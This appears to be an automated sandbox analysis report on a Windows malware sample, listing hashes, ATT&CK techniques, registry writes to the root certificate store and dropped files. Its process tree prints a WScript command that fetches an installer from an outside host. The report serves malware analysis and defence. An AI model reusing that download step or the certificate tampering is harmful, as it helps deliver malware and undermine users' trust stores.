c9299695d4a8a0ad3df0256d0bf8895745cac2b379bc283570d7d1d1db61fd7e

Analysis

max time kernel
119s
max time network
132s
platform
windows7_x64
resource
win7-20231215-en
resource tags

arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
submitted
10/01/2024, 05:54

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2024-01-09_53e6685b0612954ed8a55beeadf3b6d1_mafia.exe
Size

184KB
MD5

53e6685b0612954ed8a55beeadf3b6d1
SHA1

2d630d317ec9d49059d2e2b126c1bdc54203b00c
SHA256

c9299695d4a8a0ad3df0256d0bf8895745cac2b379bc283570d7d1d1db61fd7e
SHA512

f976dd2182abf08de0ba5dc5d601718c355f2a983743d498bb460284dd7ae457f0275820c32995d094d3db591f204f0a1bc5127f741cf97af30242adbb5fbf1b
SSDEEP

3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3Y:/7BSH8zUB+nGESaaRvoB7FJNndnR

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 11 IoCs

flow	pid	Process
6	2064	WScript.exe
8	2572	WScript.exe
10	2572	WScript.exe
12	2572	WScript.exe
14	2572	WScript.exe
16	564	WScript.exe
17	564	WScript.exe
19	2656	WScript.exe
20	2656	WScript.exe
22	480	WScript.exe
23	480	WScript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies system certificate store 2 TTPs 5 IoCs

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 19000000010000001000000068cb42b035ea773e52ef50ecf50ec529030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47409000000010000000c000000300a06082b060105050703011d0000000100000010000000918ad43a9475f78bb5243de886d8103c140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c00b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f00740000000f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f20000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474	WScript.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 040000000100000010000000acb694a59c17e0d791529bb19706a6e40f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47419000000010000001000000068cb42b035ea773e52ef50ecf50ec52920000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474	WScript.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 0f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9	WScript.exe

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 2832 wrote to memory of 2064	2832	2024-01-09_53e6685b0612954ed8a55beeadf3b6d1_mafia.exe	28
PID 2832 wrote to memory of 2064	2832	2024-01-09_53e6685b0612954ed8a55beeadf3b6d1_mafia.exe	28
PID 2832 wrote to memory of 2064	2832	2024-01-09_53e6685b0612954ed8a55beeadf3b6d1_mafia.exe	28
PID 2832 wrote to memory of 2064	2832	2024-01-09_53e6685b0612954ed8a55beeadf3b6d1_mafia.exe	28
PID 2832 wrote to memory of 2572	2832	2024-01-09_53e6685b0612954ed8a55beeadf3b6d1_mafia.exe	30
PID 2832 wrote to memory of 2572	2832	2024-01-09_53e6685b0612954ed8a55beeadf3b6d1_mafia.exe	30
PID 2832 wrote to memory of 2572	2832	2024-01-09_53e6685b0612954ed8a55beeadf3b6d1_mafia.exe	30
PID 2832 wrote to memory of 2572	2832	2024-01-09_53e6685b0612954ed8a55beeadf3b6d1_mafia.exe	30
PID 2832 wrote to memory of 564	2832	2024-01-09_53e6685b0612954ed8a55beeadf3b6d1_mafia.exe	34
PID 2832 wrote to memory of 564	2832	2024-01-09_53e6685b0612954ed8a55beeadf3b6d1_mafia.exe	34
PID 2832 wrote to memory of 564	2832	2024-01-09_53e6685b0612954ed8a55beeadf3b6d1_mafia.exe	34
PID 2832 wrote to memory of 564	2832	2024-01-09_53e6685b0612954ed8a55beeadf3b6d1_mafia.exe	34
PID 2832 wrote to memory of 2656	2832	2024-01-09_53e6685b0612954ed8a55beeadf3b6d1_mafia.exe	36
PID 2832 wrote to memory of 2656	2832	2024-01-09_53e6685b0612954ed8a55beeadf3b6d1_mafia.exe	36
PID 2832 wrote to memory of 2656	2832	2024-01-09_53e6685b0612954ed8a55beeadf3b6d1_mafia.exe	36
PID 2832 wrote to memory of 2656	2832	2024-01-09_53e6685b0612954ed8a55beeadf3b6d1_mafia.exe	36
PID 2832 wrote to memory of 480	2832	2024-01-09_53e6685b0612954ed8a55beeadf3b6d1_mafia.exe	38
PID 2832 wrote to memory of 480	2832	2024-01-09_53e6685b0612954ed8a55beeadf3b6d1_mafia.exe	38
PID 2832 wrote to memory of 480	2832	2024-01-09_53e6685b0612954ed8a55beeadf3b6d1_mafia.exe	38
PID 2832 wrote to memory of 480	2832	2024-01-09_53e6685b0612954ed8a55beeadf3b6d1_mafia.exe	38

C:\Users\Admin\AppData\Local\Temp\2024-01-09_53e6685b0612954ed8a55beeadf3b6d1_mafia.exe
"C:\Users\Admin\AppData\Local\Temp\2024-01-09_53e6685b0612954ed8a55beeadf3b6d1_mafia.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2832
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf6D63.js" http://www.djapp.info/?domain=BJaxNReWaF.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf6D63.exe
  2⤵
  - Blocklisted process makes network request
  PID:2064
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf6D63.js" http://www.djapp.info/?domain=BJaxNReWaF.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf6D63.exe
  2⤵
  - Blocklisted process makes network request
  - Modifies system certificate store
  PID:2572
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf6D63.js" http://www.djapp.info/?domain=BJaxNReWaF.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf6D63.exe
  2⤵
  - Blocklisted process makes network request
  - Modifies system certificate store
  PID:564
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf6D63.js" http://www.djapp.info/?domain=BJaxNReWaF.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf6D63.exe
  2⤵
  - Blocklisted process makes network request
  PID:2656
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf6D63.js" http://www.djapp.info/?domain=BJaxNReWaF.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf6D63.exe
  2⤵
  - Blocklisted process makes network request
  PID:480

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27

Filesize
1KB

MD5
5715e1e4e62ee95e6c31685978092461

SHA1
ce8e30eb8b38daeca2086e11ed1c56e8f54ab303

SHA256
b73d92204f95668af2b0d464cf51a0e084d30e829bfc72a7ab917b6a45b5e226

SHA512
93dd9e60f4e73edfb9a45c96fe437c98e4746731b37d15a25b46e11ce965c0068ac52c08b6065c379cd6485866529f0da0faf62d07801539e1d5499628331bf3

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27

Filesize
408B

MD5
5f8693c91133130d981ef1cc353e4448

SHA1
b94aff210c07dff9114210c6d589739072fdbf77

SHA256
28eb8a48e1629db6f275268c3440f32dc9466a6dd51d8ab46bdb435d424cd993

SHA512
b5920807edf76c0cc752f222804acfe45fd83da9f4d46c5933f5f7ee379b15e3cca6c7738e1d88a732f8afa766dabe3fc429589b47cf3de1ada4c6fc81d7684a

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
ca6f1acab3ac708c482e14f8ce1b4d41

SHA1
be3a762188244daa4404149e322df2cf5c76d4cb

SHA256
ed7cf475ed7e4237595e2a1e34aa90bda048ab9151140bb29c6053127109c815

SHA512
b15c1fdbec3e0f8b59fd37c2e548ca42e37119939454a86507e9877e70962ca3855bf701c4aadea3fca4ceee9ce9e9d8ec7a6546ecb13c205cf57c8df1615f80

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RU3RPYUN\domain_profile[1].htm

Filesize
6KB

MD5
fd7f9ffc3da852e350f041d8a4d8700b

SHA1
b19cef3ea58435498e84015e75b7972617b1ef7f

SHA256
dd64b05de8168a3196d02cb1bb60a4430b235496e2c59f10eaa9b3a8e8b732bf

SHA512
0e8d31e46e691ee18df78fb5d02102e61770eb2e46cb267e6968dbf183fa926ffc24da4b6a124dd434841f6d36f1bf462b32dc41cf01c95193e5cad4284058aa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\U9VC31Q9\domain_profile[1].htm

Filesize
41KB

MD5
b5c15185ec50edb6d2e6055d8caff6ee

SHA1
4502d94d1ee8c42579134961cd3ccfbca009a61e

SHA256
0840d41dbde26a4029b8a48f925a8dcfe01189b49cc2439b73ec21b35eac95c9

SHA512
a7174da3bbc0092dc66d91061dcde2783b354c35f4219e0229c2745fd4c6013111751f8dea422c9440cfbf3663b7cf537fde56cd4bba9d2c69d0bdcd428320e7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\U9VC31Q9\domain_profile[1].htm

Filesize
6KB

MD5
5259fe9b6ff09723230e4f2c9497096d

SHA1
12ba9a2a0893cc47119485abeb48e78e5d392f45

SHA256
41018211711798411247fae341a27e18b2a12f9153b3c7f6443e8c526b888e01

SHA512
79e0a551b9a10ef599ed3dd0202792bb6629690bef65ddc172308f3fc3ec9a89982286762f71c36cf9f88388ad7184c50f1bf430fdd96c0d026b0ff16902181a

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabF2BA.tmp

Filesize
12KB

MD5
3f07daf6da423742a991155ce7bd4d7c

SHA1
f6a61e2cdf177aefecce83eacc5ee2dcbd2dcfdf

SHA256
a55a72b9e5379c7e1e3c6419f913d9ac19096773329f6e01f817c7f74db12068

SHA512
e73ed8dab65f625746a9fea52d79abd09e9dec99db1e55ec57e5c65e60e53f0a651dcdf206394916bc3979e2e3b5749acd513b951c2f04a00eb0526dc1ce6808

Download Submit
C:\Users\Admin\AppData\Local\Temp\TarF2FB.tmp

Filesize
126KB

MD5
5c5f6688b90955a929c8c6b2dc61e375

SHA1
414775f4a11009a3d58ae47a701f09009dfd045b

SHA256
3cc3d474825b321dfaaa70ae4e5a2c560f89c094084cf646bb2226e54265563e

SHA512
d91a69c835fcc391f53a67e111bbd64f4aa9d5d1db3bcef1515dc18143a13ed3b0965d65bba680395b6519e43948b446bf91cacc9c7094ba7503bf9fc5988206

Download Submit
C:\Users\Admin\AppData\Local\Temp\fuf6D63.js

Filesize
3KB

MD5
3813cab188d1de6f92f8b82c2059991b

SHA1
4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

SHA256
a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

SHA512
83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\Z779FX7L.txt

Filesize
177B

MD5
89f75a8e5eed8c650bfc677e51a9da39

SHA1
d706fa3d182013ef93a6ea4533488cc23c6116dd

SHA256
6704d3b4b9775b0cc91090a195d17132879165f48793662b383a6793d94f7a3d

SHA512
f93a99326bc61206cec7df5c998cdee8acda8b311fcc53d262858620eb258a8559d2f87cba164ae2898f4960d2ea9a27b9202781114fce59bfcdcbdb3137093f

Download Submit